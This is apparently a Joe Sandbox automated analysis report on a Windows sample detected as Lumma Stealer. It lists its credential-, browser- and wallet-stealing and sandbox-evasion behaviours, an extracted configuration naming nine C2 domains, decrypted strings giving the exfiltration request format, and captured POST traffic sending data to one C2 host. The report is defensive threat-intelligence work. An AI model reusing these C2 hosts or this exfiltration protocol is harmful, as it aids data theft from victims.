Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AaEBZ7icLd.exe

Overview

General Information

Sample name:AaEBZ7icLd.exe
renamed because original name is a hash value
Original sample name:52135372423d0e2a9e1a9c11c188df25.exe
Analysis ID:1581237
MD5:52135372423d0e2a9e1a9c11c188df25
SHA1:6809f399ba1106c2761da024156ebd606febfe39
SHA256:ad7dbcf74d0a449e97d6e4c94ce91f2c0b02414ae40ebfd523bffaa00ce1e29f
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • AaEBZ7icLd.exe (PID: 5632 cmdline: "C:\Users\user\Desktop\AaEBZ7icLd.exe" MD5: 52135372423D0E2A9E1A9C11C188DF25)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "mindhandru.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 11 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:11.907933+010020283713Unknown Traffic192.168.2.549711172.67.165.185443TCP
                2024-12-27T08:59:13.895136+010020283713Unknown Traffic192.168.2.549713172.67.165.185443TCP
                2024-12-27T08:59:16.606177+010020283713Unknown Traffic192.168.2.549714172.67.165.185443TCP
                2024-12-27T08:59:19.060275+010020283713Unknown Traffic192.168.2.549716172.67.165.185443TCP
                2024-12-27T08:59:21.643605+010020283713Unknown Traffic192.168.2.549722172.67.165.185443TCP
                2024-12-27T08:59:24.460638+010020283713Unknown Traffic192.168.2.549728172.67.165.185443TCP
                2024-12-27T08:59:27.045522+010020283713Unknown Traffic192.168.2.549736172.67.165.185443TCP
                2024-12-27T08:59:30.334772+010020283713Unknown Traffic192.168.2.549742172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:12.671287+010020546531A Network Trojan was detected192.168.2.549711172.67.165.185443TCP
                2024-12-27T08:59:14.650892+010020546531A Network Trojan was detected192.168.2.549713172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:12.671287+010020498361A Network Trojan was detected192.168.2.549711172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:14.650892+010020498121A Network Trojan was detected192.168.2.549713172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:20.137751+010020480941Malware Command and Control Activity Detected192.168.2.549716172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T08:59:27.062550+010028438641A Network Trojan was detected192.168.2.549736172.67.165.185443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: AaEBZ7icLd.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://mindhandru.buzz:443/apilAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apiwa2C6Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/sAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/gaBC8Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/msAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/piPAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/PAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/YAvira URL Cloud: Label: malware
                Found malware configuration
                Source: AaEBZ7icLd.exe.5632.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "mindhandru.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: AaEBZ7icLd.exeVirustotal: Detection: 56%Perma Link
                Source: AaEBZ7icLd.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: AaEBZ7icLd.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: AaEBZ7icLd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.5:49736 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49716 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49713 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49713 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49711 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49736 -> 172.67.165.185:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LF9ILW66AEACCQ6TMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AGNW0CGYF99SV8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15053Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T6NABLCP2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20513Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M02EWWBEYB8UUNW6QOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5KSXFNFJUILJS228X71User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569731Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: AaEBZ7icLd.exe, 00000000.00000003.2279767060.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301994724.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278178086.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: AaEBZ7icLd.exe, 00000000.00000003.2343494094.00000000010CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft&
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275772729.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: AaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2319423730.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343601449.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343643486.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/P
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251208237.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2250351988.00000000010F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/Y
                Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275790023.0000000001083000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000002.2352761941.000000000107C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiwa2C6
                Source: AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/gaBC8
                Source: AaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ms
                Source: AaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2196925171.0000000001092000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276125542.00000000010F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: AaEBZ7icLd.exe, 00000000.00000003.2275750558.00000000010F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/piP
                Source: AaEBZ7icLd.exe, 00000000.00000003.2301854330.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2301952073.00000000010F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/s
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apil
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
